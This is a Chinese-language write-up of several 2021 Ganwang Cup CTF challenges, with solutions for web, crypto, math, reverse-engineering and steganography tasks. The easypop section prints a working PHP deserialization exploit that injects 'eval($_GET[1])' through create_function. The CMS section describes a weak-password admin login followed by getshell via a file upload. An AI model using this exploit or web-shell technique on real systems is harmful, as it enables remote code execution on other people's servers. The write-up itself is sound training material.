2021年赣网杯部分writeup

本文介绍了网络安全中的代码漏洞挖掘技术,包括PHP反序列化、JavaScript游戏逻辑漏洞利用、图片隐藏信息提取以及加密解码过程。通过线性回归方程解析坐标获取flag,并涉及Python pyc文件逆向工程和图片中二维码的解码。此外,还涵盖了弱口令攻击、文件上传漏洞和CMS系统的安全性。

checkin

连连看

查看源码,存在多个js文件

在game.js中获取flag{134791e2-d93c-4d01-a71f-dcbe82d7fe08}

easypop

unserialize($this->key)(); 关键点在这

当[new BBB,”test”]()

 会调用BBB的test方法

然后$a('', $this->code);

经典create_function 的格式

 poc

<?php
class func
{
       public $mod1;
       public $mod2;
       public $key;
}
 
class GetFlag
{       public $code;
        public $action;
       public function get_flag(){
           $a=$this->action;
           $a('', $this->code);
       }
}
$o = new func();
$o1 = new GetFlag();
$o1->code ="1;}eval(\$_GET[1]);/*";
$o1->action = 'create_function';
$o->key = serialize(array($o1,"get_flag"));
echo(urlencode(serialize($o)));

 挖洞大师

国际cms v1.1

通过index.php/admin,自动跳转到后台

 

真正后台地址

弱口令一把梭,admin  88888888

添加上传的文件后缀.php

主题模板处getshell

 拿到flag

Decodemaster

 打开decodemaster文档

全选修改为等线,取出字符串

取出字符串使用维吉尼亚密钥爆破,密钥为welcomegwb

 

解码标记的字符串

进行base92编码

进行base58编码,拿到flag

i-love-math

 打开文本显示一段字符串

Base32 解码,得到x,y的坐标值

通过绘图可知,为线性回归方程,进行线性拟合

拟合结果如下

把F(X)的首个数字整数位和+号后面的整数位进行 ASCII转换后为flag的值,最后124.9取整为125,所以为|,存在0.9999的偏差

flag{L1n34r_R3g7e5S10n_A_G0Od_Th1ng|

整理最终结果flag{L1n34r_R3g7e5S10n_A_G0Od_Th1ng}

testcat

 最新版pyinstxtractor.py 提取出1.pyc

修改文件头字节,uncompyle6 反编译1.pyc

修改代码print出结果

=4ld+EiemdFQQJWVfBTahUCMrgXJ

反转后得到JXgrMCUhaTBfVWJQQFdmeiE+dl4=

Base64解码得到

%x+0%!i0_UbP@Wfz!>v^

为zip密码,解压出cat

查看cat文件为png

用stegSolve打开图片,blue paln0 得到二维码

扫码得出flag{Ju57_E4sy_2_93t_17}

评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值